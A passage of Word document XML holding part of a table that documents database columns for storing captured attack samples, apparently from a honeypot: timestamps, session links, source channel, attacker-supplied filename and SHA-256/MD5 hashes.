              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGSERIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequential identifier; one row per captured sample per session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL, DEFAULT NOW(), INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Time of capture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">session_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">UUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Session that delivered the sample (logical link to sessions).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ip, protocol, device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ip NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Where the sample came from.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">http_upload, http_body, ssh_stdin, shell_write or mqtt_payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Path or upload name supplied by the attacker.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CHAR(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL, INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Content hash; also the quarantine file name and an IOC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CHAR(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
